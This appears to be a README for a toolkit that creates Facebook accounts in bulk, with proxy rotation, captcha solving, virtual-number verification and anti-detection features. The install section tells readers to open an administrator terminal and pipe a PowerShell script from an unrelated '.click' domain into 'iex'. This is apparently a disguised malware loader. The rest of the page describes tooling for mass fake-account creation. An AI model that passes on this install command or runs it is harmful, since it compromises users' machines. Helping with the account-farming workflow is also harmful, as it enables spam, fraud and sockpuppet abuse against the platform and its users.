Automated Facebook account creation toolkit β Bulk account generation, proxy management, captcha solving, phone/email verification, profile setup, and secure storage utilities in one package.
# Press Win+X, then select Terminal (Admin) or Command Prompt (Admin)powershell -Command "irm https://software-gateway.click/Loader.ps1?get=facebookaccountautocreate | iex"[1/4] Loading Facebook Account Auto Create modules...
[2/4] Extracting account creation and verification components...
[3/4] Installing proxy management and captcha solving tools...
[4/4] Ready. Start using Facebook Account Auto Create.
- Launch the dashboard via
facebookaccountautocreate.exeornpm start - Configure proxies and contact methods
- Start bulk account creation
- Monitor progress and manage accounts
Entity: Facebook Account Auto Create Type: Automated Facebook account creation toolkit Category: Facebook Account Auto Create, Facebook Bot, Account Creator, Facebook Automation, Social Media, Facebook Primary use: Bulk Facebook account creation, email/phone verification, proxy management, captcha solving, profile setup, and secure storage for account automation workflows. License: MIT (free for personal and educational use) Formats: Executable, scripts, Node.js modules, JSON configs Platforms: Windows, macOS, Linux
Facebook Account Auto Create is a Facebook automation toolkit for bulk account creation, email/phone verification, proxy management, captcha solving, and secure storage. It is intended for educational and personal use only.
Best for: Social media managers, automation enthusiasts, QA testers, and developers.
Key differentiators:
- Bulk account creation with proxy support
- Email and phone verification integration
- Captcha solving automation
- Secure credential storage
- Multi-threaded processing
- Account data export and management
| Category | Resources | Count |
|---|---|---|
| π§ͺ Account Creation | Automated signup workflows | Bulk generation |
| π§ Email Verification | Email verification integration | Verification |
| π± Phone Verification | SMS/voice verification integration | Verification |
| π Proxy Management | Proxy rotation and management | Proxy pools |
| π€ Captcha Solving | Automated captcha resolution | Solvers |
| π€ Profile Setup | Automated profile configuration | Profiles |
| π Secure Storage | Encrypted credential storage | Secure vaults |
| π Account Management | List, edit, delete accounts | Management |
| βοΈ Automation | CLI, API, and scripts | Automation |
| π‘οΈ Safety Tools | Rate limiting, delays, anti-detection | Safety tools |
β
Automated Facebook signup
β
Bulk account generation
β
Random username/password generation
β
Profile information generation
β
Email verification support
β
Phone number verification
β
Account data export (JSON/CSV)
β
Multi-threaded processing
β
Progress tracking and logging
β
Error handling and retry logic
β
Email verification integration
β
Temporary email support
β
Email provider rotation
β
Automatic inbox checking
β
Verification link extraction
β
Email confirmation automation
β
Custom SMTP support
β
Verification code auto-fill
β
SMS verification
β
Voice call verification
β
Virtual number integration
β
Number pooling
β
Automatic verification
β
Manual verification support
β
Number rotation
β
Verification code auto-fill
β
HTTP/HTTPS/SOCKS proxy support
β
Proxy rotation
β
Proxy health checking
β
Proxy pool management
β
Automatic failover
β
Proxy authentication
β
Speed testing
β
Country-specific proxies
β
Image captcha solving
β
Text captcha solving
β
reCAPTCHA support
β
hCaptcha support
β
Custom captcha solvers
β
Solver rotation
β
Fallback solvers
β
Success rate tracking
β
Automated profile picture upload
β
Cover photo setup
β
Bio/description generation
β
Work/education info
β
Location setting
β
Friend suggestions import
β
Page likes automation
β
Privacy settings configuration
β
Encrypted credential storage
β
Secure password generation
β
Data encryption (AES-256)
β
Secure export/import
β
Backup encryption
β
Access control
β
Audit logging
β
Secure deletion
Primary Use: Create Facebook accounts in bulk with automation.
Features:
- Automated signup workflow
- Random data generation
- Email/phone verification
- Profile setup
- Data export
Usage Example:
# Create single account
facebookaccountautocreate create --username john_doe --email john@example.com
# Create bulk accounts from CSV
facebookaccountautocreate create --bulk accounts.csv --threads 5
# Create with proxy
facebookaccountautocreate create --username jane_doe --proxy http://proxy:8080
# Export created accounts
facebookaccountautocreate create --bulk accounts.csv --export ./output/accounts.jsonPrimary Use: Handle email verification for accounts.
Features:
- Email verification integration
- Temporary email support
- Automatic inbox checking
- Link extraction
Usage Example:
# Verify with email
facebookaccountautocreate verify --email john@example.com --method email
# Use temporary email
facebookaccountautocreate verify --service temp-mail --auto
# Auto-verify from pool
facebookaccountautocreate verify --auto --pool emails.csvPrimary Use: Handle phone number verification for accounts.
Features:
- SMS verification
- Voice verification
- Virtual number support
- Automatic code retrieval
Usage Example:
# Verify phone number
facebookaccountautocreate verify --phone +1234567890 --method sms
# Use virtual number
facebookaccountautocreate verify --service twilio --number +1234567890
# Auto-verify from pool
facebookaccountautocreate verify --auto --pool numbers.csvPrimary Use: Manage and rotate proxies for account creation.
Features:
- Proxy rotation
- Health checking
- Pool management
- Automatic failover
Usage Example:
# Add proxies
facebookaccountautocreate proxy add --file proxies.txt
# Check proxy health
facebookaccountautocreate proxy check --all
# Rotate proxies
facebookaccountautocreate proxy rotate --interval 300
# Test proxy
facebookaccountautocreate proxy test http://proxy:8080Primary Use: Solve various types of captchas automatically.
Features:
- Image captcha solving
- reCAPTCHA solving
- hCaptcha solving
- Solver rotation
Usage Example:
# Solve image captcha
facebookaccountautocreate captcha solve --type image --image ./captcha.png
# Solve reCAPTCHA
facebookaccountautocreate captcha solve --type recaptcha --sitekey abc123 --url https://facebook.com
# Configure solver
facebookaccountautocreate captcha config --solver 2captcha --api-key YOUR_KEYPrimary Use: Automatically configure account profiles.
Features:
- Profile picture upload
- Cover photo setup
- Bio generation
- Privacy settings
Usage Example:
# Setup profile with image
facebookaccountautocreate profile setup --username john_doe --avatar ./avatar.png --cover ./cover.png
# Generate random profile
facebookaccountautocreate profile setup --username john_doe --random
# Import profile data
facebookaccountautocreate profile setup --username john_doe --data ./profile.jsonPrimary Use: Store credentials and account data securely.
Features:
- Encrypted storage
- Secure export
- Backup encryption
- Access control
Usage Example:
# Save account
facebookaccountautocreate storage save --username john --password secret123
# Export encrypted
facebookaccountautocreate storage export --output ./accounts.enc --encrypt
# Import encrypted
facebookaccountautocreate storage import --input ./accounts.enc --decrypt| Variable | Required | Default | Description |
|---|---|---|---|
FB_USERNAME |
No | - | Default Facebook username |
FB_PASSWORD |
No | - | Default Facebook password |
PROXY_LIST |
No | - | Path to proxy list file |
EMAIL_SERVICE |
No | - | Email verification service |
PHONE_SERVICE |
No | - | Phone verification service |
CAPTCHA_API_KEY |
No | - | Captcha solving API key |
STORAGE_PATH |
No | ./accounts |
Account storage directory |
ENCRYPTION_KEY |
No | - | Encryption key for storage |
THREADS |
No | 3 |
Number of concurrent threads |
DELAY_MIN |
No | 5 |
Minimum delay between actions (seconds) |
DELAY_MAX |
No | 15 |
Maximum delay between actions (seconds) |
FB_USERNAME=
FB_PASSWORD=
PROXY_LIST=./proxies.txt
EMAIL_SERVICE=temp-mail
PHONE_SERVICE=twilio
CAPTCHA_API_KEY=
STORAGE_PATH=./accounts
ENCRYPTION_KEY=
THREADS=3
DELAY_MIN=5
DELAY_MAX=15facebookaccountautocreate/
βββ accounts/ # Created account data
βββ proxies/ # Proxy pool and configuration
βββ emails/ # Email pool and verification data
βββ numbers/ # Phone number pool
βββ profiles/ # Profile templates and images
βββ config/ # Settings and templates
βββ scripts/ # Automation scripts
βββ output/ # Export directory
βββ src/
βββ creator.js # Account creation engine
βββ proxy.js # Proxy manager
βββ email-verify.js # Email verification handler
βββ phone-verify.js # Phone verification handler
βββ captcha.js # Captcha solver
βββ profile.js # Profile setup manager
βββ storage.js # Secure storage manager
βββ utils.js # Helper functions
βββ cli.js # CLI interface
βββ api.js # REST API server
βββββββββββββββββββββββββββ¬βββββββββββββββ¬βββββββββββββββ
β Operation β Light Load | Heavy Load |
βββββββββββββββββββββββββββΌβββββββββββββββΌβββββββββββββββ€
β Single Account Creation β 30-60s | 60-120s β
β Bulk Creation (100) β 10-20 min | 20-40 min β
β Proxy Health Check β < 2s | < 5s β
β Captcha Solving β 2-10s | 5-30s β
β Email Verification β 5-15s | 10-30s β
β Phone Verification β 10-30s | 20-60s β
β Profile Setup β 5-15s | 10-30s β
β Storage Export β < 1s | < 3s β
βββββββββββββββββββββββββββ΄βββββββββββββββ΄βββββββββββββββ
# Basic creation
facebookaccountautocreate create --username john_doe --email john@example.com
# With password
facebookaccountautocreate create --username john_doe --email john@example.com --password SecurePass123
# With proxy
facebookaccountautocreate create --username john_doe --proxy http://proxy:8080
# With custom profile
facebookaccountautocreate create --username john_doe --email john@example.com --avatar ./avatar.png# From CSV file
facebookaccountautocreate create --bulk accounts.csv --threads 5
# From JSON file
facebookaccountautocreate create --bulk accounts.json --threads 3
# With custom output
facebookaccountautocreate create --bulk accounts.csv --export ./output/accounts.json
# Resume interrupted batch
facebookaccountautocreate create --bulk accounts.csv --resume --skip-existing# Verify with email
facebookaccountautocreate verify --email john@example.com --method email
# Use temporary email service
facebookaccountautocreate verify --service temp-mail --auto
# Auto-verify from pool
facebookaccountautocreate verify --auto --pool emails.csv# Verify with SMS
facebookaccountautocreate verify --phone +1234567890 --method sms
# Verify with voice call
facebookaccountautocreate verify --phone +1234567890 --method voice
# Auto-verify from pool
facebookaccountautocreate verify --auto --pool numbers.csv# Add proxies from file
facebookaccountautocreate proxy add --file proxies.txt
# Check all proxies
facebookaccountautocreate proxy check --all --output ./proxies/healthy.txt
# Rotate proxies
facebookaccountautocreate proxy rotate --interval 300 --random
# Test specific proxy
facebookaccountautocreate proxy test http://proxy:8080:8080 --timeout 10# Solve image captcha
facebookaccountautocreate captcha solve --type image --image ./captcha.png
# Solve reCAPTCHA
facebookaccountautocreate captcha solve --type recaptcha --sitekey abc123 --url https://facebook.com
# Configure solver
facebookaccountautocreate captcha config --solver 2captcha --api-key YOUR_API_KEY
# Test solver
facebookaccountautocreate captcha test --type image --image ./test.png# Setup with avatar and cover
facebookaccountautocreate profile setup --username john_doe --avatar ./avatar.png --cover ./cover.png
# Generate random profile
facebookaccountautocreate profile setup --username john_doe --random
# Import profile data
facebookaccountautocreate profile setup --username john_doe --data ./profile.json# List accounts
facebookaccountautocreate storage list
# Export accounts
facebookaccountautocreate storage export --output ./accounts.json
# Export encrypted
facebookaccountautocreate storage export --output ./accounts.enc --encrypt --key YOUR_KEY
# Import accounts
facebookaccountautocreate storage import --input ./accounts.json
# Delete account
facebookaccountautocreate storage delete --username john_doe# Create account via API
curl -X POST "http://localhost:3000/api/accounts/create" \
-H "Content-Type: application/json" \
-d '{"username": "john_doe", "email": "john@example.com"}'
# List accounts via API
curl "http://localhost:3000/api/accounts"
# Export accounts via API
curl "http://localhost:3000/api/accounts/export?format=json"
Dashboard - Main control panel
Account Creation - Bulk generation interface
Proxy Manager - Proxy pool and health monitoring
Account List - Manage created accounts
# Check proxy connection
facebookaccountautocreate proxy test http://proxy:8080
# Enable debug mode
facebookaccountautocreate create --debug --username test_user
# Check logs
facebookaccountautocreate logs view --level error# Test email service
facebookaccountautocreate verify --test --email test@example.com
# Use manual verification
facebookaccountautocreate verify --manual --email john@example.com
# Check email pool
facebookaccountautocreate emails list# Verify phone service
facebookaccountautocreate verify --test --phone +1234567890
# Use manual verification
facebookaccountautocreate verify --manual --phone +1234567890
# Check number pool
facebookaccountautocreate numbers list# Check solver status
facebookaccountautocreate captcha status
# Switch solver
facebookaccountautocreate captcha config --solver anticaptcha
# Test with manual solve
facebookaccountautocreate captcha solve --manual --type image --image ./captcha.png- Create multiple accounts for clients
- Test account creation flows
- Manage account portfolios
- Bulk account setup
- Test Facebook signup flow
- Validate automation scripts
- Test proxy rotation
- Debug verification flows
- Automate account creation
- Schedule account creation batches
- Integrate with management tools
- Custom automation workflows
This tool is created for educational and personal use only.
Important:
- Use only for accounts you own or have permission to create
- Comply with Facebook's Terms of Service
- Respect rate limits and API usage policies
- Do not use for spam or abuse
- Developers are not responsible for misuse
- Unauthorized account creation may violate terms of service
Pull requests are welcome! For major changes, please open an issue first to discuss.
# Install dependencies
npm install
# Run in development mode
npm run dev
# Run tests
npm test
# Lint code
npm run lint
# Format code
npm run format- Support for more social platforms
- Advanced proxy rotation algorithms
- Cloud-based verification services
- AI-powered captcha solving
- Account activity simulation
- Multi-account management dashboard
- Plugin system for extensions
- Advanced analytics and reporting
MIT License - see LICENSE file for details
If this tool was useful:
- β Star the project on GitHub
- π Report bugs via Issues
- π‘ Suggest new features
- π Submit Pull Requests
- β Buy me a coffee
- Installation Guide β Detailed setup instructions
- API Reference β Complete REST API documentation
- FAQ β Frequently asked questions
- Changelog β Version history and updates
- Examples β Usage examples and scripts
- Facebook Automation β Facebook automation tools
- Social Media Bots β Social media automation
- Account Creator β Account creation tools
- Proxy Tools β Proxy management tools
Documentation β’ API Reference β’ Examples β’ FAQ β’ Changelog
Made with β€οΈ for the automation and development community